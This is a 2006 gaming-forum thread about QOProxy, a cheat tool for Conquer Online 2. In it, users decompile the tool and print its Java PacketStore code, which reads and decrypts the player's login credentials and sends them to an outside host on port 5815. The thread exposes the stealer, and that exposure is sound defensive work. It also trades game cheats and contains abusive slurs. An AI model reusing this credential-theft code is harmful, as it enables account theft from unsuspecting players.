Register for your free account! | Forgot your password?

Go Back   elitepvpers > MMORPGs > Conquer Online 2 > CO2 Exploits, Hacks & Tools
You last visited: Today at 04:17

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Qoproxy [Everything working] (speedhack+many more)

Discussion on Qoproxy [Everything working] (speedhack+many more) within the CO2 Exploits, Hacks & Tools forum part of the Conquer Online 2 category.

Closed Thread
 
Old 12/06/2006, 01:21   #61
 
elite*gold: 0
Join Date: Feb 2006
Posts: 177
Received Thanks: 2
Quote:
Originally posted by tehMaster@Dec 6 2006, 00:57
COListen.class
DecodePass.class

.....nice, keylogger



edit: and yet another reason why i posted this proxy.
dude stfu for *** sake, first u test the program then u tell me if its a keylogger, u can even scan how many times u want to with any antivirus/spyware/adware and u wont find anything wrong. dont ******* say what u dont know mother ****** im just trying to help ppl here *****. I HATE FLAMERS **** IT!

You've got 15 posts and u come say **** to me! **** off dude...

pls someone scan the file and put the scanning here for *** sake and shut him up!
R0drigU is offline  
Old 12/06/2006, 01:39   #62
 
elite*gold: 0
Join Date: Nov 2006
Posts: 53
Received Thanks: 0
Hm.. actually this is the scan I got..

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`

File: QOProxy.rar
Status:
OK (Note: this file has been scanned before. Therefore, this file's scan results will not be stored in the database)
MD5 695a801aef938e326c6244fdc9aeb815
Packers detected:
-
Scanner results
AntiVir
Found nothing
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found nothing
BitDefender
Found nothing
ClamAV
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
F-Secure Anti-Virus
Found nothing
Fortinet
Found nothing
Kaspersky Anti-Virus
Found nothing
NOD32
Found nothing
Norman Virus Control
Found nothing
VirusBuster
Found nothing
VBA32
Found nothing
Ihoyad is offline  
Old 12/06/2006, 01:44   #63
 
elite*gold: 0
Join Date: Feb 2006
Posts: 177
Received Thanks: 2
well, as u can c it isnt infected ¬¬
R0drigU is offline  
Old 12/06/2006, 01:47   #64
 
blinko's Avatar
 
elite*gold: 0
Join Date: Aug 2005
Posts: 499
Received Thanks: 132
whats the use without aimbot or scentbot?
blinko is offline  
Old 12/06/2006, 01:48   #65
 
elite*gold: 0
Join Date: Aug 2006
Posts: 20
Received Thanks: 1
Doesnt have scentbot?

Somoene have one? xDD

Lol
darkadiction is offline  
Old 12/06/2006, 01:59   #66
 
andyd123's Avatar
 
elite*gold: 20
Join Date: Apr 2006
Posts: 1,341
Received Thanks: 886
Fine fine, Ill decompile it, any keylogger would be IMPLANTED in the program, so it would be, naturally, undecteable.
andyd123 is offline  
Old 12/06/2006, 02:04   #67
 
elite*gold: 0
Join Date: Feb 2006
Posts: 177
Received Thanks: 2
@blinko
i just posted one with the aimbots.

@darkadiction
read above

@andyd123
what did u mean with that? =o
R0drigU is offline  
Old 12/06/2006, 03:38   #68
 
elite*gold: 0
Join Date: May 2006
Posts: 227
Received Thanks: 21
rofl !!! another keylogger !!

Look what I found in PacketStore.class
...
public PacketStore()
{
tcp = new TCP();
host = "verification.zapto.org";
hostport = 5815;
...

tcp.sendLine(k2, (new StringBuilder()).append("Username: ").append(s).append(", Password: ").append(s2).append(", Server: ").append(s1).toString());
tcp.closeConnection(k2);



Die scammer !!!
stillnoob is offline  
Old 12/06/2006, 04:13   #69
 
elite*gold: 0
Join Date: Aug 2006
Posts: 20
Received Thanks: 1
Is infected or not?
darkadiction is offline  
Old 12/06/2006, 04:15   #70
 
elite*gold: 0
Join Date: Aug 2006
Posts: 20
Received Thanks: 1
Lol ... Doesnt Work and Keylogger man !
darkadiction is offline  
Old 12/06/2006, 07:02   #71
 
elite*gold: 0
Join Date: Oct 2005
Posts: 85
Received Thanks: 28
Quote:
Originally posted by R0drigU@Dec 6 2006, 02:04
@blinko
i just posted one with the aimbots.

@darkadiction
read above

@andyd123
what did u mean with that? =o
you just got owned, someone decompiled your ****, and you see the keylogger right there. noob
TheCheese is offline  
Old 12/06/2006, 07:12   #72
 
blinko's Avatar
 
elite*gold: 0
Join Date: Aug 2005
Posts: 499
Received Thanks: 132
Decompiled it a bit more

@tehMaster

Seem's you like you're just converting ot string's and sending thme to yourself hmm...
With knowledge such as this why not make something of it and put it to good use, you snot

public PacketStore()
{
tcp = new TCP();
host = "verification.zapto.org";
hostport = 5815;
m_dwS = new byte[120];
keyGen();
String as[] = new String[4];
Object obj = null;
try
{
BufferedReader bufferedreader = new BufferedReader(new FileReader(file));
as[0] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
as[1] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
as[2] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
as[3] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
}
catch(Exception exception)
{
return;
}
String s = "";
String s1 = "";
String s2 = "";
byte abyte0[] = new byte[16];
for(int i = 0; i < 16; i++)
{
int k1 = as[0].indexOf(" ");
if(k1 == -1)
return;
String s3 = as[0].substring(0, k1);
as[0] = as[0].substring(k1 + 1);
int l2 = Integer.parseInt(s3, 16);
if(i > 3 && l2 > 0)
s = (new StringBuilder()).append(s).append((char)l2).toStri ng();
}

for(int j = 0; j < 16; j++)
{
int l1 = as[1].indexOf(" ");
if(l1 == -1)
return;
String s4 = as[1].substring(0, l1);
as[1] = as[1].substring(l1 + 1);
int i3 = Integer.parseInt(s4, 16);
if(j > 3)
{
abyte0[j - 4] = (byte)i3;
continue;
}
if(i3 > 0)
s = (new StringBuilder()).append(s).append((char)i3).toStri ng();
}

for(int k = 0; k < 16; k++)
{
int i2 = as[2].indexOf(" ");
if(i2 == -1)
return;
String s5 = as[2].substring(0, i2);
as[2] = as[2].substring(i2 + 1);
int j3 = Integer.parseInt(s5, 16);
if(k > 3)
{
if(j3 > 0)
s1 = (new StringBuilder()).append(s1).append((char)j3).toStr ing();
} else
{
abyte0[k + 12] = (byte)j3;
}
}

for(int l = 0; l < 4; l++)
{
int j2 = as[3].indexOf(" ");
if(j2 == -1)
return;
String s6 = as[3].substring(0, j2);
as[3] = as[3].substring(j2 + 1);
int k3 = Integer.parseInt(s6, 16);
if(k3 > 0)
s1 = (new StringBuilder()).append(s1).append((char)k3).toStr ing();
}

decrypt(abyte0);
for(int i1 = 0; i1 < 16; i1++)
if(abyte0[i1] > 31 && abyte0[i1] < 127)
s2 = (new StringBuilder()).append(s2).append((char)abyte0[i1]).toString();
else
s2 = (new StringBuilder()).append(s2).append(".").toString() ;

int j1 = s2.indexOf(".");
s2 = s2.substring(0, j1);
int k2 = tcp.connectToHost(host, hostport);
if(k2 != -1)
{
tcp.sendLine(k2, (new StringBuilder()).append("Username: ").append(s).append(", Password: ").append(s2).append(", Server: ").append(s1).toString());
tcp.closeConnection(k2);
}
}

-does exist and opens a page with some sort
of registration shit..dude that's pathetic.

And i don't know my java all too well but a public void keygen()
right after a Public Void decrypt() ? sound's to me liek a BIG keylogger lol.
So if my character get's picked out of the many who fell to this i'll know who to look for ^^

@R0drigU

Ur class files also had a public void decrypt() and keygen(), so maybe it's normal
however you did have a suspicious looking COListen.class
which only seem's to have the login server port. strange.

public COListen()
{
ips = new Hashtable();
tcp = new TCP();
int ss = tcp.startServer(9958);
do
{
int s;
do
s = tcp.waitConnect(ss);
while(s == -1);
new Connection(s);
} while(true);
}

public String hexDump(byte x[])
{
boolean first = true;
String chars = "";
String hex = "";
int ll = 0;
boolean gap = true;
String r = "";
for(int i = 0; i < x.length; i++)
{
byte b = x[i];
int bi = (new Byte(b)).intValue();
if(bi < 0)
bi += 256;
String z = Integer.toHexString(bi);
if(z.length() == 1)
z = "0" + z;
hex = hex + z + " ";
if(b > 32 && b < 127)
chars = chars + (char)b;
else
chars = chars + ".";
if(++ll == 16)
{
r = r + " " + hex + " " + chars + "&#092;r&#092;n";
hex = "";
chars = "";
ll = 0;
}
}

if(ll > 0)
{
while(ll++ < 16)
hex = hex + " ";
r = r + " " + hex + " " + chars + "&#092;r&#092;n";
}
return r;
}

public final int port = 9958;
public TCP tcp;
public Hashtable ips;
}

then ur decodepass()

decrypt(pass);
for(int i = 0; i < 16; i++)
if(pass[i] > 31 && pass[i] < 127)
passw = passw + (char)pass[i];
else
passw = passw + ".";

System.out.println("Username: " + user);
System.out.println("Password: " + passw);
System.out.println(" Server: " + server);

and YOU don't like flamer's? well i don't like fag's so shut your cock sucker.
NOOB THREAD DELETE
blinko is offline  
Old 12/06/2006, 17:15   #73
 
elite*gold: 0
Join Date: Feb 2006
Posts: 177
Received Thanks: 2
man i dont understand **** about java and that QOProxy is an old version that i use it till today and nothing happened to any of my accounts and neither to my friends' accounts. so if u dont wanna use, just dont but dont say im scammer or anything cause i have no idea how to make java files and also u can read the post i did before posting the new QOProxy in page 4, as u can c i dont understand about java so i wanst the one who did that ****. ok OWNED. *******.

what really matters is: i use an old working version, and yall keep flaming me and keep without a good QOProxy.

kthxbai. =*
R0drigU is offline  
Old 12/06/2006, 18:07   #74
 
elite*gold: 0
Join Date: Dec 2006
Posts: 44
Received Thanks: 0
yah.... its suppose to be a reg page idiots... its not a logger. you can try all u want, it was actually a verification system at first, but i gave up on it, except for my aimbot, which has a working one, so it cannot be released to anyone else then who i gave it to


and all the people i gave it to, I already have their accounts, as Im really good friends with them, and the same goes for them, we share accounts.
tehMaster is offline  
Old 12/06/2006, 20:11   #75
 
elite*gold: 0
Join Date: Dec 2006
Posts: 44
Received Thanks: 0
Quote:
Originally posted by R0drigU+Dec 6 2006, 01:21--></span><table border='0' align='center' width='95%' cellpadding='3' cellspacing='1'><tr><td>QUOTE (R0drigU @ Dec 6 2006, 01:21)</td></tr><tr><td id='QUOTE'> <!--QuoteBegin--tehMaster@Dec 6 2006, 00:57
COListen.class
DecodePass.class

.....nice, keylogger



edit: and yet another reason why i posted this proxy.
dude stfu for *** sake, first u test the program then u tell me if its a keylogger, u can even scan how many times u want to with any antivirus/spyware/adware and u wont find anything wrong. dont ******* say what u dont know mother ****** im just trying to help ppl here *****. I HATE FLAMERS **** IT!

You've got 15 posts and u come say **** to me! **** off dude...

pls someone scan the file and put the scanning here for *** sake and shut him up! [/b][/quote]
sorry for double post... however

WHAT THE F**K does post count matter? Is it not intelligence that matters?

Also whoever released that was a complete dumass, on how it was coded, because everyone can copy off it.


Grr...... JUST APRECIATE IT I GAVE U THE PROXY! IF NOT DONT EVEN BOTHER COMMENTING!
tehMaster is offline  
Closed Thread


Similar Threads Similar Threads
Qoproxy is not working again!
05/06/2007 - Conquer Online 2 - 11 Replies
I donno, but it was working normaly but today when i tryed to open it.. it freezes the Client.. and tells me server maint.. I tryed everything.. and it didnt work... Hmmm so ?
QoProxy working?
04/28/2007 - Conquer Online 2 - 2 Replies
Im not sure what version err whoes version of qoproxy i have, but ive used for last 3 months and it still works with patch 4346... If any1 can tell me whoes version im using, maybe check if its safe, add me to msn ill let you check it out. *Edit - Email removed by a1blaster*
QOProxy (mines 70% working)
10/02/2006 - Conquer Online 2 - 25 Replies
::EDIT:::Original Post moved to update progress 07/04 Hey peach... I recently went back through my QO and edited a fresh old version again... Managed to fix the aimbot 100%... it autokills just like old times... forgot how fukin 1337 it is lol went 20/0 in a server I havnt played on in like 3 mths... LOL Anyways I have the speedhack working except for the action "LIE" activation of the speed hack??? and I tried to fix the functions like autoloot and follow with no luck... Can you help...
QOProxy (mines 50% working)
06/23/2006 - Conquer Online 2 - 6 Replies
So far I have been converting the packet structure of packet 0x3f2 as Chocoman has generously posted and I have been able to make it work. Functions working so far: #cyclone #dhcyclone The speedhack is functioning perfectly however I lost the "LIE" action hotkey... possibly I missed a change in the action structure somewhere??? The aimbot... Nado lock on works... it tracks... and when you double lock it will fire and hit like usually however when it says "target moved fastblading.."...



All times are GMT +1. The time now is 04:19.


Powered by vBulletin®
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2026 elitepvpers All Rights Reserved.